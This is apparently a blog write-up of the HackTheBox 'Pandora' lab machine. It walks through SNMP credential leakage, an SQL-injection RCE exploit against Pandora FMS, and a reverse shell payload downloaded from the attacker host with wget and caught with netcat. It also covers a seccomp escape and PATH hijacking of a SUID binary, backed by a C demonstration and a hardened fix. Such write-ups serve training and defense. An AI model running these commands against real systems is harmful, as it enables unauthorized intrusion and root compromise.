Hi everyone! Today’s write-up is on Pandora, an easy GNU/Linux machine released on 10th January 2022. I wouldn’t call the machine easy if you are one of those who build the SQL injection exploit from scratch; someone recently published a PoC exploit for the underlying (older) CVE for this HackTheBox challenge, so I leeched on it. This machine is good practice for OSCP, especially since its foothold is similar to a retired OSCP exam machine. At the time of writing it is not in TJ Null’s OSCP list yet; maybe it will be added in the future.
To give a brief overview, this machine requires enumerating the SNMP service, pivoting (SSH port forwarding) to an internal website, finding an SQL injection vulnerability in that website and either crafting your own exploit or using the one someone wrote for this challenge, escaping the setuid()-family restriction that the old libapache2-mpm-itk used by the Apache2 service imposes on everything spawned from the web server, and finally escalating privileges by PATH hijacking a SUID program. Let’s get started!
Nmap enumeration
kali@kali~$ IP=10.10.11.136
kali@kali~$ sudo nmap -n -p- $IP
...
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

kali@kali~$ sudo nmap -sC -sV -p22,80 $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SNMP enumeration
kali@kali~$ snmp-check $IP
...
[*] Processes:
  Id   Status    Name   Path      Parameters
  ...
  845  runnable  sh     /bin/sh   -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
Via the SNMP service (snmp-check’s default read-only community string “public” is accepted), we can read the host’s process table including full command lines, and one process carries a username and password as arguments. Anything passed on a command line is visible to every local user through ps, and, when SNMP exposes HOST-RESOURCES-MIB, to anyone on the network who can read it; secrets belong in a file or environment the process reads itself, not in argv.
SSH into the machine
Since we now have a credential and the SSH service is open, we can try it there.
kali@kali~$ ssh daniel@$IP
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ECDSA key fingerprint is SHA256:9urFJN3aRYRRc9S5Zc+py/w4W6hmZ+WLg6CyrY+5MDI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ECDSA) to the list of known hosts.
daniel@10.10.11.136's password: HotelBabylon23
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 30 Jan 08:32:05 UTC 2022

  System load:  0.0               Processes:             444
  Usage of /:   72.3% of 4.87GB   Users logged in:       1
  Memory usage: 23%               IPv4 address for eth0: 10.10.11.136
  Swap usage:   0%

  => /boot is using 91.8% of 219MB

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

daniel@pandora:~$
Access matt’s account
Looking at matt’s home directory, we can see the user flag is there, but it is owned by root with group matt and mode 640, so only root and members of the matt group can read it; daniel cannot.
daniel@pandora:~$ ls /home
daniel  matt
daniel@pandora:~$ ls -l /home/matt/
-rw-r----- 1 root matt 33 Jan 30 08:44 user.txt
Discovering localhost web service
Checking /var/www, there is a second directory, “pandora”, next to “html”; “html” holds the uninteresting public-facing website we already saw via Nmap. The Apache site configuration confirms that “pandora” is served by a separate virtual host.
daniel@pandora:~$ cd /var/www
daniel@pandora:/var/www$ ls
html  pandora
daniel@pandora:/var/www$ ls /etc/apache2/sites-available/
000-default.conf  default-ssl.conf  pandora.conf
daniel@pandora:/var/www$ cat /etc/apache2/sites-available/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>
The VirtualHost is bound to localhost:80, so it is only reachable from the machine itself; because that address match is more specific than the default site’s *:80, any request arriving on the loopback interface on port 80 is routed to it regardless of the Host header, which is why plain http://localhost works later. The AssignUserID directive is an mpm-itk directive: requests to this vhost are handled by a worker running as user matt, so any code execution in the web application will land as matt rather than www-data.
Pivoting and accessing the internal website
We can use SSH local port forwarding to reach it from Kali. Note that binding local port 80 requires root on the Kali side (otherwise ssh prints “Privileged ports can only be forwarded by root” and the forward is silently dropped); if you are not root, forward to a high port such as 8080 instead and adjust the URLs below accordingly.
kali@kali~$ ssh daniel@$IP -L 80:localhost:80
daniel@10.10.11.136's password: HotelBabylon23
This allows us to access the internal website.

The footer of the website shows it is running Pandora FMS v7.0NG.742_FIX_PERL2020. A quick Google turns up the published vulnerability research for that version, including an unauthenticated SQL injection (CVE-2021-32099, in the session_id parameter of chart_generator.php), as well as a ready-made unauthenticated exploit for it.
Remote Code Execution (RCE)
First, download the exploit someone published recently. You can of course read the research and write your own instead.
kali@kali~$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
Then run the exploit with Python3. The “shell” it gives us is really just Remote Code Execution (RCE) through a PHP file it uploads into the images directory (pwn.php), not an interactive shell: the injection forges an admin session cookie, and that session is used to upload the payload.
kali@kali~$ cd Pandora_v7.0NG.742_exploit_unauthenticated
kali@kali:Pandora_v7.0NG.742_exploit_unauthenticated$ python3 sqlpwn.py -t localhost
URL: http://localhost/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : j8cgngqha6bemscvkv72iv2rfr
[+] Sending Payload
[+] Respose : 200
[+] Pwned 🙂
[+] If you want manual Control : http://localhost/pandora_console/images/pwn.php?test=
CMD > whoami
matt
CMD >
Understanding RCE Exploit (optional)
Following the OSCP way, we need a proper reverse shell, since web-based RCE on its own is not accepted as a shell. First, check the machine’s architecture.
CMD > uname -a
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Since it is a 64-bit machine, we can generate a reverse shell with msfvenom (remember to change LHOST to your own machine’s IP address). We host it with Python’s HTTP server so the target can download it with wget. Port 22 did not work for me as the serving/listening port; I assume an iptables rule restricts outbound traffic from the box to a few ports such as 80 and 443, so I used 443 for both the download and the callback.
kali@kali~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.49 LPORT=443 -f elf > shellx64.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
kali@kali~$ sudo python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
Download it using the RCE “shell” and make it executable before running it later.
CMD > wget http://10.10.14.49:443/shellx64.elf -O /tmp/shellx64.elf
CMD > chmod 755 /tmp/shellx64.elf
CMD > ls -l /tmp
total 8
-rwxr-xr-x 1 matt matt 194 Jan 30 16:56 shellx64.elf
-rwxrwxrwx 1 matt matt  10 Jan 30 13:00 tar
Stop the HTTP server (it is occupying port 443) and use Netcat to listen on that same port for the incoming reverse shell connection.
kali@kali~$ nc -lvnp 443
listening on [any] 443 ...
Finally, execute the file via the RCE “shell”; our Netcat listener should receive a connection. I then upgraded the shell to a TTY with python3.
CMD > /tmp/shellx64.elf

kali@kali~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.49] from (UNKNOWN) [10.10.11.136] 51122
python3 -c 'import pty; pty.spawn("/bin/bash")'
matt@pandora:/var/www/pandora/pandora_console/images$
Obtaining user flag
matt@pandora:/var/www/pandora/pandora_console/images$ cd /home/matt
matt@pandora:/home/matt$ ls
user.txt
matt@pandora:/home/matt$ cat user.txt
36f**************************
Privilege escalation
SUID
When searching for SUID programs, I noticed an interesting one named after the web application.
matt@pandora:/home/matt$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
Running it, I was greeted with an error message.
matt@pandora:/home/matt$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed! Check your permissions!
Dumping the binary’s contents, I noticed a string holding the full command the program runs.
matt@pandora:/home/matt$ hexdump -C /usr/bin/pandora_backup
...
00002000  01 00 02 00 00 00 00 00  50 61 6e 64 6f 72 61 46  |........PandoraF|
00002010  4d 53 20 42 61 63 6b 75  70 20 55 74 69 6c 69 74  |MS Backup Utilit|
00002020  79 00 00 00 00 00 00 00  4e 6f 77 20 61 74 74 65  |y.......Now atte|
00002030  6d 70 74 69 6e 67 20 74  6f 20 62 61 63 6b 75 70  |mpting to backup|
00002040  20 50 61 6e 64 6f 72 61  46 4d 53 20 63 6c 69 65  | PandoraFMS clie|
00002050  6e 74 00 00 00 00 00 00  74 61 72 20 2d 63 76 66  |nt......tar -cvf|
00002060  20 2f 72 6f 6f 74 2f 2e  62 61 63 6b 75 70 2f 70  | /root/.backup/p|
00002070  61 6e 64 6f 72 61 2d 62  61 63 6b 75 70 2e 74 61  |andora-backup.ta|
00002080  72 2e 67 7a 20 2f 76 61  72 2f 77 77 77 2f 70 61  |r.gz /var/www/pa|
00002090  6e 64 6f 72 61 2f 70 61  6e 64 6f 72 61 5f 63 6f  |ndora/pandora_co|
000020a0  6e 73 6f 6c 65 2f 2a 00  42 61 63 6b 75 70 20 66  |nsole/*.Backup f|
000020b0  61 69 6c 65 64 21 0a 43  68 65 63 6b 20 79 6f 75  |ailed!.Check you|
000020c0  72 20 70 65 72 6d 69 73  73 69 6f 6e 73 21 00 42  |r permissions!.B|
000020d0  61 63 6b 75 70 20 73 75  63 63 65 73 73 66 75 6c  |ackup successful|
000020e0  21 00 54 65 72 6d 69 6e  61 74 69 6e 67 20 70 72  |!.Terminating pr|
000020f0  6f 67 72 61 6d 21 00 00  01 1b 03 3b 3c 00 00 00  |ogram!.....;<...|
00002100  06 00 00 00 28 ef ff ff  88 00 00 00 88 ef ff ff  |....(...........|
Two things stand out in that command: tar is invoked by its bare name rather than an absolute path, and the trailing /var/www/pandora/pandora_console/* needs a shell to expand the glob, so the string is almost certainly handed to system() and run through /bin/sh. The shell resolves “tar” through the caller’s PATH, and we control PATH, so we can hijack the lookup.
Fixing seteuid()
While attempting the path hijack from the reverse shell, I hit a problem: /usr/bin/pandora_backup was not actually running as root. Running “sudo -l” from that shell shows why.
matt@pandora:/var/www/pandora/pandora_console/DEBIAN$ sudo -l
sudo: PERM_ROOT: setresuid(0, -1, -1): Operation not permitted
sudo: unable to initialize policy plugin
A quick Google shows that older libapache2-mpm-itk packages install a seccomp filter (backing its LimitUIDRange/LimitGIDRange options) that makes the setuid family of syscalls, such as seteuid() and setresuid(), fail with EPERM. The filter is inherited across fork and exec, so every process descended from the Apache worker, including our web shell, the reverse shell it spawned and any SUID binary run from them, is affected: the SUID binary still starts with euid 0 (which is why sudo gets as far as calling setresuid), but it cannot change its UIDs, and tar ends up running as matt. There is a StackOverflow post and an official bug report about it. The documentation shipped on the machine is from late 2013; note that the README date is not the package version (the version is in changelog.Debian.gz), but the sudo error above already confirms the restriction is in place.
matt@pandora:/home/matt$ find / -name libapache2-mpm-itk 2>/dev/null
/usr/share/doc/libapache2-mpm-itk
matt@pandora:/home/matt$ ls /usr/share/doc/libapache2-mpm-itk
README.Debian  changelog.Debian.gz  copyright
matt@pandora:/home/matt$ cat /usr/share/doc/libapache2-mpm-itk/README*
mpm-itk for Debian
------------------

Note that mpm-itk has gone from being a true MPM to just being a module
that hooks into prefork. You can safely remove the old apache2-mpm-itk
package if you still have it installed.

 -- Steinar H. Gunderson <sesse@debian.org>  Thu, 07 Nov 2013 20:16:19 +0100
Thus, we can break out of the restricted environment with the at command, copying the one-liner with arguments from GTFOBins. This works because the job is executed by atd, a separate daemon: the new /bin/sh runs as matt in a fresh process tree that is not a descendant of Apache and therefore does not inherit the seccomp filter.
matt@pandora:/home/matt$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null
warning: commands will be executed using /bin/sh
job 4 at Mon Jan 31 03:13:00 2022
/bin/sh: 0: can't access tty; job control turned off
$
Path hijacking
In daniel’s SSH session, use nano to create a file in daniel’s home directory. Somehow my reverse shell was having a hard time creating the exploit file, so the SSH session is easier.
daniel@pandora:~$ mkdir spoiler
daniel@pandora:~$ cd spoiler/
daniel@pandora:~/spoiler$ nano tar
The fake tar copies bash and sets the SUID bit on the copy, so that I don’t need yet another reverse shell, which is troublesome.
#!/bin/bash
cp /bin/bash /home/matt/bash
chmod u+s /home/matt/bash
Once the file is saved, make it executable by everyone (matt only needs read and execute on the file and traverse on the directory, so 755 would do as well).
daniel@pandora:~/spoiler$ chmod 777 tar
Finally, in matt’s unrestricted shell (the one obtained via at, not the web shell), prepend the spoiler directory to PATH and run the SUID program. Now that the binary really runs as root, the shell it spawns resolves “tar” to our script, which therefore runs as root.
$ export PATH="/home/daniel/spoiler:$PATH"
$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
Backup successful!
Terminating program!
$ ls -l
total 1160
-rwsr-xr-x 1 root matt 1183448 Jan 31 03:15 bash
-rw-r----- 1 root matt      33 Jan 30 08:44 user.txt
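To make the mechanism concrete, here is an added example in C; it is not the source of pandora_backup (which the page does not show) and not part of the original write-up. It assumes, from the embedded string and the glob in it, that the binary passes the command to system(); the vulnerable and hardened functions, the resolve_in_path() lookup and the hijack_demo() helper are all illustrative names, and the scratch directory under /tmp is created by the example itself. The self-test plants a fake “tar” and shows that a PATH with a writable directory prepended resolves to it, while a pinned PATH does not; the planted file is never executed.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* ASSUMED reconstruction of the bug class, not the real binary's source:
 * the embedded "tar -cvf ... /var/www/pandora/pandora_console/*" needs a
 * shell for the glob, so it is most likely passed to system(). /bin/sh then
 * resolves the bare name "tar" through $PATH, which the caller controls. */
int backup_vulnerable(void)
{
    return system("tar -cvf /root/.backup/pandora-backup.tar.gz "
                  "/var/www/pandora/pandora_console/*");
}

/* Hardened variant: absolute path, no shell, argv passed as a vector and a
 * fixed minimal environment, so nothing inherited from the caller decides
 * which binary runs. (A real SUID helper would also validate its inputs
 * instead of taking archive/srcdir from the caller.) */
int backup_hardened(const char *archive, const char *srcdir)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/tar", "-cf", (char *)archive, (char *)srcdir, NULL };
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        execve("/bin/tar", argv, envp);
        _exit(127);                    /* only reached if execve() fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Resolve a bare command the way /bin/sh does: scan PATH left to right and
 * take the first regular executable file. Returns 1 and fills `out` when
 * found, 0 otherwise. This is the lookup an attacker wins by prepending a
 * directory they can write to. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen)
{
    char *copy = strdup(path);
    if (!copy)
        return 0;
    int found = 0;
    for (char *dir = strtok(copy, ":"); dir; dir = strtok(NULL, ":")) {
        char cand[8192];
        struct stat st;
        snprintf(cand, sizeof cand, "%s/%s", dir, cmd);
        if (stat(cand, &st) == 0 && S_ISREG(st.st_mode) && access(cand, X_OK) == 0) {
            snprintf(out, outlen, "%s", cand);
            found = 1;
            break;
        }
    }
    free(copy);
    return found;
}

/* Plant a fake "tar" in a scratch directory (constructed here), then resolve
 * "tar" once with that directory prepended to PATH (what the SUID program's
 * shell sees) and once with a pinned PATH (what the hardened version forces).
 * Returns 1 when the hijacked lookup landed on the planted file. */
int hijack_demo(char *hijacked, size_t hlen, char *pinned, size_t plen)
{
    char tmpl[] = "/tmp/pathhijackXXXXXX";
    char *dir = mkdtemp(tmpl);
    if (!dir)
        return 0;
    char fake[8192], attacker_path[8192];
    snprintf(fake, sizeof fake, "%s/tar", dir);
    FILE *f = fopen(fake, "w");
    if (!f) {
        rmdir(dir);
        return 0;
    }
    /* same idea as the write-up's script; it is never executed here */
    fputs("#!/bin/bash\ncp /bin/bash /home/matt/bash\nchmod u+s /home/matt/bash\n", f);
    fclose(f);
    chmod(fake, 0755);

    snprintf(attacker_path, sizeof attacker_path, "%s:/usr/bin:/bin", dir);
    int hit = resolve_in_path("tar", attacker_path, hijacked, hlen);
    resolve_in_path("tar", "/usr/bin:/bin", pinned, plen);
    int ok = hit && strcmp(hijacked, fake) == 0;
    unlink(fake);
    rmdir(dir);
    return ok;
}

static char demo_hijacked[8192], demo_pinned[8192];

/* Convenience wrapper so the result can be inspected after the run. */
int run_demo(void)
{
    return hijack_demo(demo_hijacked, sizeof demo_hijacked, demo_pinned, sizeof demo_pinned);
}

int main(void)
{
    int ok = run_demo();
    printf("hijacked PATH resolves tar to: %s\n", demo_hijacked);
    printf("pinned   PATH resolves tar to: %s\n", demo_pinned[0] ? demo_pinned : "(not found)");
    printf("hijack %s\n", ok ? "succeeds" : "fails");
    return ok ? 0 : 1;
}
```

Build with `gcc -Wall -o hijack hijack.c && ./hijack`. The fix is not “use /usr/bin/tar” alone: the hardened function also avoids the shell (so no glob or metacharacter interpretation of anything an attacker influences) and discards the inherited environment, since variables such as LD_PRELOAD or IFS are the same class of problem as PATH.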
Spawn root shell
Since the copy of bash is now owned by root with the SUID bit set, running it with -p (which stops bash from dropping the effective UID back to the real UID) gives us a root shell.
$ ./bash -p
bash: cannot set terminal process group (833): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0# id
uid=1000(matt) gid=1000(matt) euid=0(root) groups=1000(matt)
bash-5.0#
Obtaining root flag
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
d94****************************
I hope this write-up has been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂